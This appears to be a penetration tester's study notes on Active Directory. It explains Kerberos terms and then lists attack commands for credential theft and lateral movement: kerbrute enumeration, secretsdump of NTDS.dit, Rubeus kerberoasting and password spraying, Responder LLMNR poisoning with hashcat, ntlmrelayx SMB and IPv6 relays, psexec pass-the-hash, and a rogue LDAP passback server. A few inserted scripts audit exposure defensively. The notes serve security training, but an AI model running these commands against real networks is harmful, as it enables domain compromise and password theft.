Active Directory

What is Active Directory (AD)

A collection of machines and servers connected inside a domain. Domains in turn form part of what is known as a forest, which makes up the Active Directory network.

Domain Controllers (DC)

  • The server running Active Directory Domain Services (AD DS) is a Domain Controller.

  • The centre of the Active Directory.

  • Controls the domain

    • Holds the AD DS data store.

    • Handles all authentication and authorization.

    • Allows admins to manage domain resources.

AD DS Store

Holds database and processes needed to store and manage directory information.

  • Contains NTDS.dit, the database holding all of the Domain Controller's directory information as well as the users' password hashes

  • Stored by default in %SystemRoot%\NTDS

  • Accessible only by the DC

Forest

Collection of one or more domain trees inside an AD.

  • Trees - A hierarchy of AD DS

  • Domains - Used to group and manage objects

  • Trusts - Allows users to access resources in other domains

  • Objects - Users, groups, printers, computers

  • Domain Services - DNS, IPv6

  • Domain Schema - Object creation rules

  • Organizational Units (OU) - A hierarchy of existing users, groups and computers.

A Windows domain is a group of users and computers.

Active Directory centralises the administration of the common components of a Windows network.

Active Directory Domain Services (AD DS) acts as a catalogue that holds the information of all objects on the network.

User

  • People

  • Services

Machines

Security Groups - Grant permissions over resources.

Kerberos

The default authentication service for Windows; it is intended to be far more secure than NTLM and relies on a trusted third-party ticket service. Kerberos's ticket system is fairly complex and consists of many components; here are a few of them:

  • (TGT) Ticket Granting Ticket - Authentication ticket used to request tickets from the TGS

  • (TGS) Ticket Granting Service - Takes a TGT and returns a service ticket

  • (KDC) Key Distribution Center - Service for issuing TGTs and service tickets; consists of the AS and the TGS

  • (AS) Authentication Service - Issues TGTs to be used with the TGS in the domain

  • (SPN) Service Principal Name - An identifier given to a service to associate a service instance with a domain service account. Windows requires all services to have a domain service account.

  • (PAC) Privilege Attribute Certificate - Holds all of the user's authorization information; it is sent with the TGT and signed by the KDC so that the user can be validated

Enumeration

setspn -T medin -Q */*

Kerbrute

./kerbrute userenum -dc DOMAIN.local -d DOMAIN.local <USERLIST.txt>

secretsdump

secretsdump.py DC.local/USER:PASS@10.10.112.47 -ntds NTDS.DIT

  • Allows us to dump NTDS.DIT, which lets us see all the users' hashes

Kerberoasting with Rubeus

Rubeus.exe kerberoast

AS-REP Roasting

Occurs when a user account has the account option "Does not require Pre-Authentication" set. Such an account does not need to provide valid identification before requesting a ticket.
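The two exposures just described (Kerberoastable service accounts above and AS-REP roastable accounts here) both come down to attributes on the user object. This added example, which is not part of the original notes, audits constructed directory records shaped like the LDAP attributes sAMAccountName, userAccountControl and servicePrincipalName; no live domain is queried, and the flag values are the real userAccountControl bits.

```python
# Added example (not from the original notes): audit directory records for the
# two Kerberos exposures described above. Records are constructed dicts shaped
# like LDAP attributes; no live domain is queried.

# userAccountControl bit flags (real values of the AD attribute)
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,   # "Do not require Kerberos preauthentication"
}

# Constructed sample accounts (not real data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 512, "servicePrincipalName": []},
    {"sAMAccountName": "svc-sql", "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"]},
    {"sAMAccountName": "legacyapp", "userAccountControl": 4194816, "servicePrincipalName": []},
    {"sAMAccountName": "old-svc", "userAccountControl": 4194818,
     "servicePrincipalName": ["HTTP/old.domain.local"]},
]


def decode_uac(value):
    """Return the names of the userAccountControl flags set in an integer value."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def audit_kerberos_exposure(accounts):
    """Map each enabled account to the reasons it is exposed to AS-REP roasting or Kerberoasting."""
    findings = {}
    for acct in accounts:
        name, flags = acct["sAMAccountName"], decode_uac(acct["userAccountControl"])
        if "ACCOUNTDISABLE" in flags or name.lower() == "krbtgt":
            continue  # disabled accounts cannot authenticate; krbtgt is protected separately
        issues = []
        if "DONT_REQ_PREAUTH" in flags:
            issues.append("AS-REP roastable: preauthentication not required")
        if acct.get("servicePrincipalName"):
            issues.append("Kerberoastable: user account holds an SPN")
            if "DONT_EXPIRE_PASSWORD" in flags:
                issues.append("password never expires, so a cracked hash stays valid")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for account, issues in audit_kerberos_exposure(SAMPLE_ACCOUNTS).items():
        print(account, "->", "; ".join(issues))
```

Accounts in the output are the ones to fix first: remove the preauthentication exemption, and move SPN-bearing accounts to long random passwords or group managed service accounts.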

Harvesting Tickets using Rubeus

Rubeus, an adaptation of the Kekeo tool, is another powerful tool for attacking Kerberos. It supports many attacks such as overpass-the-hash, ticket requests, harvesting, pass-the-ticket, AS-REP roasting and of course Kerberoasting.

To begin harvesting tickets from the KDC, make sure Rubeus is installed on the target machine, then run:

Rubeus.exe harvest /interval:<NUM_OF_SECONDS>

Password Spraying/ Bruteforcing using Rubeus

For brute forcing, Rubeus takes a single user and a wordlist of passwords.

With password spraying it takes a single password and tries it against all the user accounts in the domain.

We need to make sure the domain name and IP are in the Windows hosts file:

echo IP DOMAIN.local >> C:\Windows\System32\drivers\etc\hosts

Rubeus.exe brute /password:<PASSWORD> /noticket

Golden/Silver Ticket Attacks

Kerberos Backdoors

Initial Attack Vectors

LLMNR Poisoning

We can intercept the NetNTLM challenge/response with a Man-in-the-Middle (MITM) attack: by poisoning the name-resolution response during NetNTLM authentication, we trick the client into talking to us instead of the real server it wanted to connect to.

Poisoning authentication challenges using Responder

sudo responder -I tun0 -dwp

In this case, we received back an SMBv2 connection and Responder extracted an NTLMv2-SSP response.

Then we used hashcat to crack it:

hashcat -m 5600 hash.txt password-list.txt --force
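The line Responder writes and hashcat -m 5600 consumes has the layout USER::DOMAIN:server_challenge:NTProofStr:blob, where the blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP. This added example, not from the original notes, decodes a constructed line into its timestamp, client challenge and target-info AV pairs, which is what you need when triaging a capture (who, which domain, when, which server) or confirming that target name and channel-binding pairs are present; the sample capture is built inline and is not real data.

```python
# Added example (not from the original notes): decode a NetNTLMv2 line in the
# hashcat -m 5600 layout USER::DOMAIN:server_challenge:NTProofStr:blob.
# The sample below is constructed, not a real capture.
import struct
from datetime import datetime, timedelta, timezone

AV_NAMES = {1: "NetBIOS computer name", 2: "NetBIOS domain name",
            3: "DNS computer name", 4: "DNS domain name", 5: "DNS tree name",
            7: "timestamp", 9: "target name", 10: "channel bindings"}
TEXT_AV_IDS = {1, 2, 3, 4, 5, 9}              # AV pairs carrying UTF-16LE strings
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_netntlmv2(line):
    """Return the fields of one hashcat 5600 line, with the blob decoded."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":                     # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2 client challenge blob")
    filetime, = struct.unpack_from("<Q", blob, 8)   # offset 8: FILETIME timestamp
    client_challenge = blob[16:24]                   # offset 16: ChallengeFromClient
    target_info, offset = {}, 28                     # offset 28: AV_PAIR list
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        if av_id == 0:                               # MsvAvEOL ends the list
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        key = AV_NAMES.get(av_id, f"av_{av_id}")
        target_info[key] = value.decode("utf-16-le") if av_id in TEXT_AV_IDS else value.hex()
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "client_challenge": client_challenge.hex(),
            "time": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
            "target_info": target_info}


def _av(av_id, text):                                 # builds one AV pair for the sample
    data = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


_when = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc)
_filetime = int((_when - FILETIME_EPOCH).total_seconds()) * 10_000_000
SAMPLE_BLOB = (b"\x01\x01" + bytes(6) + struct.pack("<Q", _filetime)
               + bytes.fromhex("0011223344556677") + bytes(4)
               + _av(2, "CORP") + _av(1, "FS01") + _av(4, "corp.local")
               + _av(3, "fs01.corp.local") + struct.pack("<HH", 0, 0) + bytes(4))
SAMPLE_LINE = "jdoe::CORP:1122334455667788:" + "aa" * 16 + ":" + SAMPLE_BLOB.hex()
```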

SMB Relays

Relay captured authentication to another machine and gain access.

  • SMB signing must be disabled (or not required) on the target

  • The relayed user's credentials must be an admin on the target machine

    • nmap --script=smb2-security-mode.nse -p445 <IP>

    • Create targets.txt with all vulnerable IPs
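The signing check above is the same one a defender runs to find hosts that still need the "Microsoft network server: Digitally sign communications (always)" policy. This added example, not from the original notes, parses the output layout of the smb2-security-mode script and lists hosts where signing is not required; the scan text is constructed, not a real result.

```python
# Added example (not from the original notes): read nmap smb2-security-mode
# output and list hosts on which SMB signing is not required. The scan text
# below is constructed, not a real scan result.
import re

SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.5
Host is up (0.023s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.6
Host is up (0.019s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""


def parse_signing(nmap_text):
    """Map each host to True when SMB message signing is required, False otherwise."""
    results, host = {}, None
    for line in nmap_text.splitlines():
        match = re.match(r"Nmap scan report for (\S+)", line)
        if match:
            host = match.group(1)
        elif host and "Message signing" in line:
            verdict = line.lstrip("|_ ").lower()      # strip nmap's script-output prefix
            results[host] = "enabled and required" in verdict
    return results


def signing_not_enforced(nmap_text):
    """Hosts where signing is optional or off: the ones the signing policy must be applied to."""
    return sorted(h for h, required in parse_signing(nmap_text).items() if not required)
```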

Steps to set up an attack

  1. sudo vi /etc/responder/Responder.conf - Make sure SMB and HTTP are switched off

  2. sudo responder -I tun0 -dwp

  3. sudo ntlmrelayx.py -tf targets.txt -smb2support

    1. -i gives us an interactive shell instead of a SAM dump

    2. -c lets you input a command like whoami

  4. Wait for an event...

Getting Shell Access

There are three main tools we can use:

  • psexec

  • wmiexec

  • smbexec

psexec.py <DOMAIN>/<AD-USER>:'<PASSWORD>'@<IP>

psexec.py <AD-USER>@<IP> -hashes <LM-HASH>:<NTLM-HASH>

IPv6 Attacks

Diverting the victim's IPv6 traffic by pretending to be its DNS server.

sudo ntlmrelayx.py -6 -t ldaps://<DC-IP> -wh fakepad.<DC> -l lootme

sudo mitm6 -d <DOMAIN>

After running this, we can see a new folder called lootme with all of our AD information, such as users and groups.

After waiting, an admin logged in and our tool created a user on the domain.

Passback Attacks

LDAP Passback Attack

A common attack against network devices, such as printers.

If you have gained initial access to the internal network, here are the basic steps.

Hosting a Rogue LDAP Server

Install the services:

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

Run the setup: sudo dpkg-reconfigure -p low slapd

Downgrade the supported authentication mechanisms so that plaintext credentials are accepted:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Apply it and restart the service:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

Use nc to capture the plaintext credentials:

nc -lvp 389

Internal Attack Strategy

  1. Run mitm6 or Responder

  2. Run scans to generate traffic

  3. If scans take too long, look at websites - http_version

  4. Look for default creds

  5. Think outside the box

  6. Keep enumerating

Post Compromise Enumeration

Domain Enum

ldapdomaindump

ldapdomaindump ldaps://<IP> -u '<DC\AD-User>' -p <PASSWORD>

Bloodhound

Creates a graphical representation of the target AD network.

neo4j needs to be running first!

sudo neo4j console

First, we have to gather some data; this can be done with Sharphound if we have access to a low-privileged account, or with bloodhound-python.

Then we can import the data to Bloodhound

Once the data has been imported, the information is visible in the Bloodhound GUI.

Plumhound

Bloodhound for Blue and Purple Teams

sudo python3 PlumHound.py -x tasks/default.tasks -p neo4j1

Will generate reports based on current information from Bloodhound

cd /opt/PlumHound/reports - the reports directory inside the PlumHound installation

We can see all the reports on a handy webpage if we serve index.html

PingCastle

For auditing and risk assessment, it will generate a report based on its scan

Post Compromise Attacks

Pass the Password

crackmapexec smb IP/CIDR -u AD-USER -d DOMAIN.local -p PASSWORD

Cracking Hashes

Pass Attacks Mitigations

Kerberoasting

Additional AD Attacks

ZeroLogon

PrintNightmare CVE

Configuration File Credentials

A way to try and find AD Credentials

  • Web app config files

  • Service config files

  • Registry keys

  • Centrally deployed apps
